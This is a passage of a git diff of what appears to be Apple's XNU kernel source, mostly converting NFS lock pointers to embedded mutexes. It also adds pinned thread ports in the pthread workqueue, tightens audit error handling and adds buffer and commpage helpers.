lck_mtx_lock(nfs_global_mutex); + lck_mtx_lock(&nfs_global_mutex); if (nfs_ephemeral_mount_harvester_on) { - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); return; } if (nfs_ephemeral_mount_harvester_timer == NULL) { @@ -4618,7 +4615,7 @@ nfs_ephemeral_mount_harvester_start(void) clock_interval_to_deadline(NFS_EPHEMERAL_MOUNT_HARVEST_INTERVAL, NSEC_PER_SEC, &deadline); thread_call_enter_delayed(nfs_ephemeral_mount_harvester_timer, deadline); nfs_ephemeral_mount_harvester_on = 1; - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); } #endif @@ -4635,7 +4632,10 @@ nfs3_check_lockmode(struct nfsmount *nmp, struct sockaddr *sa, int sotype, int t int error, port = 0; if (nmp->nm_lockmode == NFS_LOCK_MODE_ENABLED) { - bcopy(sa, &ss, sa->sa_len); + if (sa->sa_len > sizeof(ss)) { + return EINVAL; + } + bcopy(sa, &ss, MIN(sa->sa_len, sizeof(ss))); error = nfs_portmap_lookup(nmp, vfs_context_current(), (struct sockaddr*)&ss, NULL, RPCPROG_STAT, RPCMNT_VER1, NM_OMFLAG(nmp, MNTUDP) ? SOCK_DGRAM : sotype, timeo); if (!error) { if (ss.ss_family == AF_INET) { @@ -5077,10 +5077,13 @@ nfs_mount_zombie(struct nfsmount *nmp, int nm_state_flags) /* cancel any renew timer */ if ((nmp->nm_vers >= NFS_VER4) && nmp->nm_renew_timer) { + lck_mtx_lock(&nmp->nm_timer_lock); thread_call_cancel(nmp->nm_renew_timer); thread_call_free(nmp->nm_renew_timer); nmp->nm_renew_timer = NULL; + lck_mtx_unlock(&nmp->nm_timer_lock); } + #endif lck_mtx_unlock(&nmp->nm_lock); @@ -5102,14 +5105,14 @@ nfs_mount_zombie(struct nfsmount *nmp, int nm_state_flags) #if CONFIG_NFS4 if ((nmp->nm_vers >= NFS_VER4) && nmp->nm_longid) { /* remove/deallocate the client ID data */ - lck_mtx_lock(nfs_global_mutex); + lck_mtx_lock(&nfs_global_mutex); TAILQ_REMOVE(&nfsclientids, nmp->nm_longid, nci_link); if (nmp->nm_longid->nci_id) { FREE(nmp->nm_longid->nci_id, M_TEMP); } FREE(nmp->nm_longid, M_TEMP); nmp->nm_longid = NULL; - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); } #endif /* @@ -5117,7 +5120,7 @@ nfs_mount_zombie(struct nfsmount *nmp, int nm_state_flags) * and removed from the resend queue. */ TAILQ_INIT(&resendq); - lck_mtx_lock(nfs_request_mutex); + lck_mtx_lock(&nfs_request_mutex); TAILQ_FOREACH(req, &nfs_reqq, r_chain) { if (req->r_nmp == nmp) { lck_mtx_lock(&req->r_mtx); @@ -5142,7 +5145,7 @@ nfs_mount_zombie(struct nfsmount *nmp, int nm_state_flags) lck_mtx_unlock(&req->r_mtx); } } - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfs_request_mutex); /* Since we've drop the request mutex we can now safely unreference the request */ TAILQ_FOREACH_SAFE(req, &resendq, r_rchain, treq) { @@ -5159,8 +5162,8 @@ nfs_mount_zombie(struct nfsmount *nmp, int nm_state_flags) * local iod queue for processing. */ TAILQ_INIT(&iodq); - lck_mtx_lock(nfs_request_mutex); - lck_mtx_lock(nfsiod_mutex); + lck_mtx_lock(&nfs_request_mutex); + lck_mtx_lock(&nfsiod_mutex); TAILQ_FOREACH(req, &nfs_reqq, r_chain) { if (req->r_nmp == nmp) { lck_mtx_lock(&req->r_mtx); @@ -5188,8 +5191,8 @@ nfs_mount_zombie(struct nfsmount *nmp, int nm_state_flags) TAILQ_REMOVE(&nfsiodmounts, nmp, nm_iodlink); } TAILQ_CONCAT(&iodq, &nmp->nm_iodq, r_achain); - lck_mtx_unlock(nfsiod_mutex); - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfsiod_mutex); + lck_mtx_unlock(&nfs_request_mutex); TAILQ_FOREACH_SAFE(req, &iodq, r_achain, treq) { TAILQ_REMOVE(&iodq, req, r_achain); @@ -5294,11 +5297,17 @@ nfs_mount_cleanup(struct nfsmount *nmp) lck_mtx_unlock(&nmp->nm_lock); - lck_mtx_destroy(&nmp->nm_lock, nfs_mount_grp); + lck_mtx_destroy(&nmp->nm_lock, &nfs_mount_grp); if (nmp->nm_fh) { NFS_ZFREE(nfs_fhandle_zone, nmp->nm_fh); } +#if CONFIG_NFS4 + if (nmp->nm_vers >= NFS_VER4) { + lck_mtx_destroy(&nmp->nm_timer_lock, &nfs_mount_grp); + } +#endif + NFS_ZFREE(nfsmnt_zone, nmp); } @@ -6685,7 +6694,7 @@ ustat_skip: * how long the threads have been waiting. */ - lck_mtx_lock(nfs_request_mutex); + lck_mtx_lock(&nfs_request_mutex); lck_mtx_lock(&nmp->nm_lock); /* @@ -6704,19 +6713,19 @@ ustat_skip: if (req->oldptr == USER_ADDR_NULL) { // Caller is querying buffer size lck_mtx_unlock(&nmp->nm_lock); - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfs_request_mutex); return SYSCTL_OUT(req, NULL, totlen); } if (req->oldlen < totlen) { // Check if caller's buffer is big enough lck_mtx_unlock(&nmp->nm_lock); - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfs_request_mutex); return ERANGE; } MALLOC(nsp, struct netfs_status *, totlen, M_TEMP, M_WAITOK | M_ZERO); if (nsp == NULL) { lck_mtx_unlock(&nmp->nm_lock); - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfs_request_mutex); return ENOMEM; } timeoutmask = NFSSTA_TIMEO | NFSSTA_LOCKTIMEO | NFSSTA_JUKEBOXTIMEO; @@ -6760,7 +6769,7 @@ ustat_skip: } lck_mtx_unlock(&nmp->nm_lock); - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfs_request_mutex); error = SYSCTL_OUT(req, nsp, totlen); FREE(nsp, M_TEMP); diff --git a/bsd/nfs/nfs_vnops.c b/bsd/nfs/nfs_vnops.c index b03463b43..caa5533f5 100644 --- a/bsd/nfs/nfs_vnops.c +++ b/bsd/nfs/nfs_vnops.c @@ -4481,13 +4481,13 @@ again_relock: } /* lock the node while we remove the file */ - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); while (np->n_hflag & NHLOCKED) { np->n_hflag |= NHLOCKWANT; - msleep(np, nfs_node_hash_mutex, PINOD, "nfs_remove", NULL); + msleep(np, &nfs_node_hash_mutex, PINOD, "nfs_remove", NULL); } np->n_hflag |= NHLOCKED; - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); if (!namedattrs) { nfs_dulookup_init(dul, dnp, cnp->cn_nameptr, cnp->cn_namelen, ctx); @@ -4510,13 +4510,13 @@ again: if (!inuse || (np->n_sillyrename && (nvattr->nva_nlink > 1))) { if (!inuse && !flushed) { /* flush all the buffers first */ /* unlock the node */ - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); np->n_hflag &= ~NHLOCKED; if (np->n_hflag & NHLOCKWANT) { np->n_hflag &= ~NHLOCKWANT; wakeup(np); } - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); nfs_node_clear_busy2(dnp, np); error = nfs_vinvalbuf(vp, V_SAVE, ctx, 1); FSDBG(260, np, np->n_size, np->n_vattr.nva_size, 0xf00d0011); @@ -4569,13 +4569,13 @@ again: * again if another object gets created with the same filehandle * before this vnode gets reclaimed */ - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); if (np->n_hflag & NHHASHED) { LIST_REMOVE(np, n_hash); np->n_hflag &= ~NHHASHED; FSDBG(266, 0, np, np->n_flag, 0xb1eb1e); } - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); /* clear flags now: won't get nfs_vnop_inactive for recycled vnode */ /* clear all flags other than these */ nfs_node_lock_force(np); @@ -4613,13 +4613,13 @@ again: } out: /* unlock the node */ - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); np->n_hflag &= ~NHLOCKED; if (np->n_hflag & NHLOCKWANT) { np->n_hflag &= ~NHLOCKWANT; wakeup(np); } - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); nfs_node_clear_busy2(dnp, np); if (setsize) { ubc_setsize(vp, 0); @@ -4758,13 +4758,13 @@ nfs_vnop_rename( if (tvp && (tvp != fvp)) { /* lock the node while we rename over the existing file */ - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); while (tnp->n_hflag & NHLOCKED) { tnp->n_hflag |= NHLOCKWANT; - msleep(tnp, nfs_node_hash_mutex, PINOD, "nfs_rename", NULL); + msleep(tnp, &nfs_node_hash_mutex, PINOD, "nfs_rename", NULL); } tnp->n_hflag |= NHLOCKED; - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); locked = 1; } @@ -4819,7 +4819,7 @@ nfs_vnop_rename( tvprecycle = (!error && !vnode_isinuse(tvp, 0) && (nfs_getattrcache(tnp, nvattr, 0) || (nvattr->nva_nlink == 1))); nfs_node_unlock(tnp); - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); if (tvprecycle && (tnp->n_hflag & NHHASHED)) { /* * remove nfsnode from hash now so we can't accidentally find it @@ -4830,7 +4830,7 @@ nfs_vnop_rename( tnp->n_hflag &= ~NHHASHED; FSDBG(266, 0, tnp, tnp->n_flag, 0xb1eb1e); } - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); } /* purge the old name cache entries and enter the new one */ @@ -4878,13 +4878,13 @@ out: nfs_getattr(tdnp, NULL, ctx, NGA_CACHED); if (locked) { /* unlock node */ - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); tnp->n_hflag &= ~NHLOCKED; if (tnp->n_hflag & NHLOCKWANT) { tnp->n_hflag &= ~NHLOCKWANT; wakeup(tnp); } - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); } nfs_node_clear_busy4(fdnp, fnp, tdnp, tnp); FREE(nvattr, M_TEMP); @@ -5561,13 +5561,13 @@ nfsmout: * again if another object gets created with the same filehandle * before this vnode gets reclaimed */ - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); if (np->n_hflag & NHHASHED) { LIST_REMOVE(np, n_hash); np->n_hflag &= ~NHHASHED; FSDBG(266, 0, np, np->n_flag, 0xb1eb1e); } - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); } NFS_ZFREE(nfs_req_zone, req); FREE(dul, M_TEMP); @@ -5857,8 +5857,8 @@ out: * Invalidate cached directory information, except for the actual directory * blocks (which are invalidated separately). */ -void -nfs_invaldir(nfsnode_t dnp) +static void +nfs_invaldir_cookies(nfsnode_t dnp) { if (vnode_vtype(NFSTOV(dnp)) != VDIR) { return; @@ -5873,6 +5873,13 @@ nfs_invaldir(nfsnode_t dnp) memset(dnp->n_cookiecache->next, -1, NFSNUMCOOKIES); } +void +nfs_invaldir(nfsnode_t dnp) +{ + + nfs_invaldir_cookies(dnp); +} + /* * calculate how much space is available for additional directory entries. */ @@ -6037,7 +6044,7 @@ nfs_dir_cookie_to_lbn(nfsnode_t dnp, uint64_t cookie, int *ptc, uint64_t *lbnp) dpptc = NULL; found = 0; - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); /* * Scan the list of buffers, keeping them in order. * Note that itercomplete inserts each of the remaining buffers @@ -6099,7 +6106,7 @@ nfs_dir_cookie_to_lbn(nfsnode_t dnp, uint64_t cookie, int *ptc, uint64_t *lbnp) } nfs_buf_itercomplete(dnp, &blist, NBI_CLEAN); } - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); if (found) { OSAddAtomic64(1, &nfsstats.direofcache_hits); return 0; @@ -6250,7 +6257,7 @@ nfs_dir_buf_cache_lookup(nfsnode_t dnp, nfsnode_t *npp, struct componentname *cn lbn = nextlbn; } - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); if (found) { dnp->n_lastdbl = lbn; goto done; @@ -6323,7 +6330,7 @@ nfs_dir_buf_cache_lookup(nfsnode_t dnp, nfsnode_t *npp, struct componentname *cn } done: - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); if (!error && found && !purge) { error = nfs_nget(NFSTOMP(dnp), dnp, cnp, fh->fh_data, @@ -6402,7 +6409,7 @@ nfs3_readdir_rpc(nfsnode_t dnp, struct nfsbuf *bp, vfs_context_t ctx) nmrsize = nmp->nm_rsize; bigcookies = nmp->nm_state & NFSSTA_BIGCOOKIES; fh = zalloc(nfs_fhandle_zone); -noplus: +resend: rdirplus = ((nfsvers > NFS_VER2) && NMFLAG(nmp, RDIRPLUS)) ? 1 : 0; if ((lockerror = nfs_node_lock(dnp))) { @@ -6483,7 +6490,9 @@ noplus: lck_mtx_lock(&nmp->nm_lock); NFS_BITMAP_CLR(nmp->nm_flags, NFS_MFLAG_RDIRPLUS); lck_mtx_unlock(&nmp->nm_lock); - goto noplus; + nfsm_chain_cleanup(&nmreq); + nfsm_chain_cleanup(&nmrep); + goto resend; } nfsmout_if(error); @@ -7758,7 +7767,9 @@ nfs_vnop_ioctl( if (!auth_is_kerberized(mp->nm_auth)) { return ENOTSUP; } - error = nfs_gss_clnt_ctx_remove(mp, vfs_context_ucred(ctx)); + if ((error = nfs_gss_clnt_ctx_remove(mp, vfs_context_ucred(ctx))) == ENOENT) { + error = 0; + } break; case NFS_IOC_SET_CRED: case NFS_IOC_SET_CRED64: @@ -8298,11 +8309,11 @@ nfs_vnop_pageout( xsize = f_offset + size - off; } lbn = (daddr64_t)(off / biosize); - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); if ((bp = nfs_buf_incore(np, lbn))) { FSDBG(323, off, bp, bp->nb_lflags, bp->nb_flags); if (nfs_buf_acquire(bp, NBAC_NOWAIT, 0, 0)) { - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); nfs_data_unlock_noupdate(np); /* no panic. just tell vm we are busy */ if (!nofreeupl) { @@ -8352,7 +8363,7 @@ nfs_vnop_pageout( nfsbufdelwricnt++; nfs_buf_drop(bp); nfs_buf_delwri_push(1); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); nfs_data_unlock_noupdate(np); if (!nofreeupl) { ubc_upl_abort_range(pl, pl_offset, size, 0); @@ -8371,12 +8382,12 @@ nfs_vnop_pageout( FSDBG(323, bp, bp->nb_dirtyoff, bp->nb_dirtyend, 0xd00dee00); /* we're leaving this block dirty */ nfs_buf_drop(bp); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); continue; } } nfs_buf_remfree(bp); - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); SET(bp->nb_flags, NB_INVAL); nfs_node_lock_force(np); if (ISSET(bp->nb_flags, NB_NEEDCOMMIT)) { @@ -8387,7 +8398,7 @@ nfs_vnop_pageout( nfs_node_unlock(np); nfs_buf_release(bp, 1); } else { - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); } } diff --git a/bsd/nfs/nfsmount.h b/bsd/nfs/nfsmount.h index e34b4fbc0..4fb5cd680 100644 --- a/bsd/nfs/nfsmount.h +++ b/bsd/nfs/nfsmount.h @@ -314,6 +314,7 @@ struct nfsmount { uint64_t mounttime; /* used as client ID verifier */ uint64_t clientid; /* client ID, short form */ thread_call_t renew_timer; /* RENEW timer call */ + lck_mtx_t timer_lock; /* RENEW timer lock */ nfs_fsid fsid; /* NFS file system id */ TAILQ_HEAD(, nfsnode) delegations; /* list of nodes with delegations */ TAILQ_HEAD(, nfsnode) dreturnq; /* list of nodes with delegations to return */ @@ -419,6 +420,7 @@ struct nfsmount { #define nm_mounttime nm_un.v4.mounttime #define nm_fsid nm_un.v4.fsid #define nm_renew_timer nm_un.v4.renew_timer +#define nm_timer_lock nm_un.v4.timer_lock #define nm_cbid nm_un.v4.cbid #define nm_cblink nm_un.v4.cblink #define nm_cbrefs nm_un.v4.cbrefs diff --git a/bsd/nfs/nfsnode.h b/bsd/nfs/nfsnode.h index 7f7f80293..43a2f5d65 100644 --- a/bsd/nfs/nfsnode.h +++ b/bsd/nfs/nfsnode.h @@ -215,7 +215,7 @@ struct nfsbuf { LIST_HEAD(nfsbuflists, nfsbuf); TAILQ_HEAD(nfsbuffreehead, nfsbuf); -extern lck_mtx_t *nfs_buf_mutex; +extern lck_mtx_t nfs_buf_mutex; extern int nfsbufcnt, nfsbufmin, nfsbufmax, nfsbufmetacnt, nfsbufmetamax; extern int nfsbuffreecnt, nfsbuffreemetacnt, nfsbufdelwricnt, nfsneedbuffer; extern int nfs_nbdwrite; @@ -431,7 +431,7 @@ struct nfs_vattr { } while (0) -extern lck_grp_t *nfs_open_grp; +extern lck_grp_t nfs_open_grp; extern uint32_t nfs_open_owner_seqnum, nfs_lock_owner_seqnum; /* @@ -799,7 +799,7 @@ struct nfsnode { #define NFSTOV(np) ((np)->n_vnode) /* nfsnode hash table mutex */ -extern lck_mtx_t *nfs_node_hash_mutex; +extern lck_mtx_t nfs_node_hash_mutex; /* * printf-like helper macro that also outputs node name. @@ -822,7 +822,7 @@ TAILQ_HEAD(nfsiodlist, nfsiod); TAILQ_HEAD(nfsiodmountlist, nfsmount); extern struct nfsiodlist nfsiodfree, nfsiodwork; extern struct nfsiodmountlist nfsiodmounts; -extern lck_mtx_t *nfsiod_mutex; +extern lck_mtx_t nfsiod_mutex; #if defined(KERNEL) diff --git a/bsd/nfs/nfsrvcache.h b/bsd/nfs/nfsrvcache.h index 9c92b00c1..d6db9b7e9 100644 --- a/bsd/nfs/nfsrvcache.h +++ b/bsd/nfs/nfsrvcache.h @@ -125,8 +125,5 @@ struct nfsrvcache { #define RC_INETADDR 0x20 #define RC_NAM 0x40 -extern lck_grp_t *nfsrv_reqcache_lck_grp; -extern lck_mtx_t *nfsrv_reqcache_mutex; - #endif /* __APPLE_API_PRIVATE */ #endif /* _NFS_NFSRVCACHE_H_ */ diff --git a/bsd/pthread/pthread_shims.c b/bsd/pthread/pthread_shims.c index 86e618e7d..5cddcd166 100644 --- a/bsd/pthread/pthread_shims.c +++ b/bsd/pthread/pthread_shims.c @@ -512,6 +512,7 @@ static const struct pthread_callbacks_s pthread_callbacks = { .ipc_port_copyout_send = ipc_port_copyout_send, .task_get_ipcspace = get_task_ipcspace, .vm_map_page_info = vm_map_page_info, + .ipc_port_copyout_send_pinned = ipc_port_copyout_send_pinned, .thread_set_wq_state32 = thread_set_wq_state32, #if !defined(__arm__) .thread_set_wq_state64 = thread_set_wq_state64, @@ -535,11 +536,16 @@ static const struct pthread_callbacks_s pthread_callbacks = { .semaphore_signal_internal_trap = semaphore_signal_internal_trap, .current_map = _current_map, .thread_create = thread_create, + /* should be removed once rdar://70892168 lands */ + .thread_create_pinned = thread_create_pinned, + .thread_create_immovable = thread_create_immovable, + .thread_terminate_pinned = thread_terminate_pinned, .thread_resume = thread_resume, .kevent_workq_internal = kevent_workq_internal, .convert_thread_to_port = convert_thread_to_port, + .convert_thread_to_port_pinned = convert_thread_to_port_pinned, .proc_get_stack_addr_hint = proc_get_stack_addr_hint, .proc_set_stack_addr_hint = proc_set_stack_addr_hint, diff --git a/bsd/pthread/pthread_workqueue.c b/bsd/pthread/pthread_workqueue.c index bc4bd4812..e6d06d3f5 100644 --- a/bsd/pthread/pthread_workqueue.c +++ b/bsd/pthread/pthread_workqueue.c @@ -1540,8 +1540,12 @@ workq_open(struct proc *p, __unused struct workq_open_args *uap, priority_queue_init(&wq->wq_constrained_queue); priority_queue_init(&wq->wq_special_queue); - wq->wq_delayed_call = thread_call_allocate_with_options( - workq_add_new_threads_call, p, THREAD_CALL_PRIORITY_KERNEL, + /* We are only using the delayed thread call for the constrained pool + * which can't have work at >= UI QoS and so we can be fine with a + * UI QoS thread call. + */ + wq->wq_delayed_call = thread_call_allocate_with_qos( + workq_add_new_threads_call, p, THREAD_QOS_USER_INTERACTIVE, THREAD_CALL_OPTIONS_ONCE); wq->wq_immediate_call = thread_call_allocate_with_options( workq_add_new_threads_call, p, THREAD_CALL_PRIORITY_KERNEL, @@ -2835,11 +2839,14 @@ workq_constrained_allowance(struct workqueue *wq, thread_qos_t at_qos, /* * Compute a metric for many how many threads are active. We find the - * highest priority request outstanding and then add up the number of - * active threads in that and all higher-priority buckets. We'll also add - * any "busy" threads which are not active but blocked recently enough that - * we can't be sure they've gone idle yet. We'll then compare this metric - * to our max concurrency to decide whether to add a new thread. + * highest priority request outstanding and then add up the number of active + * threads in that and all higher-priority buckets. We'll also add any + * "busy" threads which are not currently active but blocked recently enough + * that we can't be sure that they won't be unblocked soon and start + * being active again. + * + * We'll then compare this metric to our max concurrency to decide whether + * to add a new thread. */ uint32_t busycount, thactive_count; @@ -2869,7 +2876,7 @@ workq_constrained_allowance(struct workqueue *wq, thread_qos_t at_qos, thactive_count, busycount, 0); } - if (busycount && may_start_timer) { + if (may_start_timer) { /* * If this is called from the add timer, we won't have another timer * fire when the thread exits the "busy" state, so rearm the timer. @@ -3270,8 +3277,6 @@ workq_select_threadreq_or_park_and_unlock(proc_t p, struct workqueue *wq, workq_thread_reset_pri(wq, uth, req, /*unpark*/ true); - thread_unfreeze_base_pri(uth->uu_thread); -#if 0 // to turn this back on if (__improbable(thread_unfreeze_base_pri(uth->uu_thread) && !is_creator)) { if (req_ts) { workq_perform_turnstile_operation_locked(wq, ^{ @@ -3284,7 +3289,6 @@ workq_select_threadreq_or_park_and_unlock(proc_t p, struct workqueue *wq, WQ_TRACE_WQ(TRACE_wq_select_threadreq | DBG_FUNC_NONE, wq, 3, 0, 0, 0); goto park_thawed; } -#endif /* * We passed all checks, dequeue the request, bind to it, and set it up @@ -3355,9 +3359,7 @@ workq_select_threadreq_or_park_and_unlock(proc_t p, struct workqueue *wq, park: thread_unfreeze_base_pri(uth->uu_thread); -#if 0 // park_thawed: -#endif workq_park_and_unlock(p, wq, uth, setup_flags); } @@ -3540,10 +3542,12 @@ workq_setup_and_run(proc_t p, struct uthread *uth, int setup_flags) } if (uth->uu_workq_thport == MACH_PORT_NULL) { - /* convert_thread_to_port() consumes a reference */ + /* convert_thread_to_port_pinned() consumes a reference */ thread_reference(th); - ipc_port_t port = convert_thread_to_port(th); - uth->uu_workq_thport = ipc_port_copyout_send(port, get_task_ipcspace(p->task)); + /* Convert to immovable/pinned thread port, but port is not pinned yet */ + ipc_port_t port = convert_thread_to_port_pinned(th); + /* Atomically, pin and copy out the port */ + uth->uu_workq_thport = ipc_port_copyout_send_pinned(port, get_task_ipcspace(p->task)); } /* diff --git a/bsd/security/audit/audit_arg.c b/bsd/security/audit/audit_arg.c index 472b15372..c4ed65792 100644 --- a/bsd/security/audit/audit_arg.c +++ b/bsd/security/audit/audit_arg.c @@ -806,7 +806,9 @@ audit_arg_vnpath(struct kaudit_record *ar, struct vnode *vp, u_int64_t flags) if (*vnode_mac_labelp != NULL) { mac.m_buflen = MAC_AUDIT_LABEL_LEN; mac.m_string = *vnode_mac_labelp; - mac_vnode_label_externalize_audit(vp, &mac); + if (mac_vnode_label_externalize_audit(vp, &mac)) { + return; + } } } #endif diff --git a/bsd/security/audit/audit_mac.c b/bsd/security/audit/audit_mac.c index 18567474f..82f9b256d 100644 --- a/bsd/security/audit/audit_mac.c +++ b/bsd/security/audit/audit_mac.c @@ -85,7 +85,10 @@ audit_mac_new(proc_t p, struct kaudit_record *ar) } mac.m_buflen = MAC_AUDIT_LABEL_LEN; mac.m_string = ar->k_ar.ar_cred_mac_labels; - mac_cred_label_externalize_audit(p, &mac); + if (mac_cred_label_externalize_audit(p, &mac)) { + zfree(audit_mac_label_zone, ar->k_ar.ar_cred_mac_labels); + return 1; + } /* * grab space for the reconds. diff --git a/bsd/security/audit/audit_session.c b/bsd/security/audit/audit_session.c index 80290b43c..f9345c4e6 100644 --- a/bsd/security/audit/audit_session.c +++ b/bsd/security/audit/audit_session.c @@ -102,7 +102,7 @@ static au_sentry_t audit_default_se = { struct auditinfo_addr * const audit_default_aia_p = &audit_default_se.se_auinfo; /* Copied from */ -#define IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND 0x1 +#define IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND 0x1 kern_return_t ipc_object_copyin(ipc_space_t, mach_port_name_t, mach_msg_type_name_t, ipc_port_t *, mach_port_context_t, mach_msg_guard_flags_t *, uint32_t); void ipc_port_release_send(ipc_port_t); @@ -1517,7 +1517,7 @@ audit_session_join(proc_t p, struct audit_session_join_args *uap, if (ipc_object_copyin(get_task_ipcspace(p->task), send, - MACH_MSG_TYPE_COPY_SEND, &port, 0, NULL, IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND) != KERN_SUCCESS) { + MACH_MSG_TYPE_COPY_SEND, &port, 0, NULL, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND) != KERN_SUCCESS) { *ret_asid = AU_DEFAUDITSID; err = EINVAL; } else { diff --git a/bsd/sys/buf.h b/bsd/sys/buf.h index f46094803..92e5fe42f 100644 --- a/bsd/sys/buf.h +++ b/bsd/sys/buf.h @@ -1036,6 +1036,22 @@ void bufattr_markioscheduled(bufattr_t bap); */ int bufattr_ioscheduled(bufattr_t bap); +/*! + * @function bufattr_markexpeditedmeta + * @abstract Mark a metadata I/O buffer as expedited (i.e. requires a high I/O tier). + * @param bap Buffer attributes to mark. + * @discussion Marks the buffer so that spec_strategy() will know that it should be expedited + */ +void bufattr_markexpeditedmeta(bufattr_t bap); + +/*! + * @function bufattr_expeditedmeta + * @abstract Check if a buffer is marked as expedited metadata I/O. + * @param bap Buffer attributes to test. + * @return Nonzero if the buffer is marked expedited metadata I/O, 0 otherwise. + */ +int bufattr_expeditedmeta(bufattr_t bap); + #ifdef KERNEL_PRIVATE void buf_setfilter(buf_t, void (*)(buf_t, void *), void *, void(**)(buf_t, void *), void **); diff --git a/bsd/sys/buf_internal.h b/bsd/sys/buf_internal.h index 279f5f8b0..beddcdbe4 100644 --- a/bsd/sys/buf_internal.h +++ b/bsd/sys/buf_internal.h @@ -167,7 +167,7 @@ extern vm_offset_t buf_kernel_addrperm; /* * These flags are kept in b_lflags... - * buf_mtxp must be held before examining/updating + * buf_mtx must be held before examining/updating */ #define BL_BUSY 0x00000001 /* I/O in progress. */ #define BL_WANTED 0x00000002 /* Process wants this buffer. */ @@ -273,6 +273,7 @@ extern vm_offset_t buf_kernel_addrperm; #define BA_STRATEGY_TRACKED_IO 0x00002000 /* tracked by spec_strategy */ #define BA_IO_TIER_UPGRADE 0x00004000 /* effective I/O tier is higher than BA_IO_TIER */ #define BA_IO_SCHEDULED 0x00008000 /* buf is associated with a mount point that is io scheduled */ +#define BA_EXPEDITED_META_IO 0x00010000 /* metadata I/O which needs a high I/O tier */ #define GET_BUFATTR_IO_TIER(bap) ((bap->ba_flags & BA_IO_TIER_MASK) >> BA_IO_TIER_SHIFT) #define SET_BUFATTR_IO_TIER(bap, tier) \ diff --git a/bsd/sys/commpage.h b/bsd/sys/commpage.h index ccdd50949..f0c627f8e 100644 --- a/bsd/sys/commpage.h +++ b/bsd/sys/commpage.h @@ -41,6 +41,56 @@ typedef volatile struct commpage_timeofday_data { uint64_t Ticks_per_sec; } new_commpage_timeofday_data_t; +/*! + * @macro COMM_PAGE_SLOT_TYPE + * + * @brief + * Macro that expands to the proper type for a pointer to a commpage slot, + * to be used in a local variable declaration. + * + * @description + * Usage is something like: + * + * COMM_PAGE_SLOT_TYPE(uint64_t) slot = COMM_PAGE_SLOT(uint64_t, FOO); + * + * + * @param type The scalar base type for the slot. + */ +#if __has_feature(address_sanitizer) +#define COMM_PAGE_SLOT_TYPE(type_t) type_t __attribute__((address_space(1))) volatile * +#else +#define COMM_PAGE_SLOT_TYPE(type_t) type_t volatile * +#endif + +/*! + * @macro COMM_PAGE_SLOT + * + * @brief + * Macro that expands to the properly typed address for a commpage slot. + * + * @param type The scalar base type for the slot. + * @param name The slot name, without its @c _COMM_PAGE_ prefix. + */ +#define COMM_PAGE_SLOT(type_t, name) ((COMM_PAGE_SLOT_TYPE(type_t))_COMM_PAGE_##name) + +/*! + * @macro COMM_PAGE_READ + * + * @brief + * Performs a single read from the commpage in a way that doesn't trip + * address sanitizers. + * + * @description + * Typical use looks like this: + * + * uint64_t foo_value = COMM_PAGE_READ(uint64_t, FOO); + * + * + * @param type The scalar base type for the slot. + * @param name The slot name, without its @c _COMM_PAGE_ prefix. + */ +#define COMM_PAGE_READ(type_t, slot) (*(COMM_PAGE_SLOT(type_t, slot))) + #endif #endif diff --git a/bsd/sys/conf.h b/bsd/sys/conf.h index 0fb01991f..24a1c08fc 100644 --- a/bsd/sys/conf.h +++ b/bsd/sys/conf.h @@ -206,14 +206,6 @@ extern uint64_t cdevsw_flags[]; #define CDEVSW_IS_PTS 0x08 struct thread; - -typedef struct devsw_lock { - TAILQ_ENTRY(devsw_lock) dl_list; - struct thread 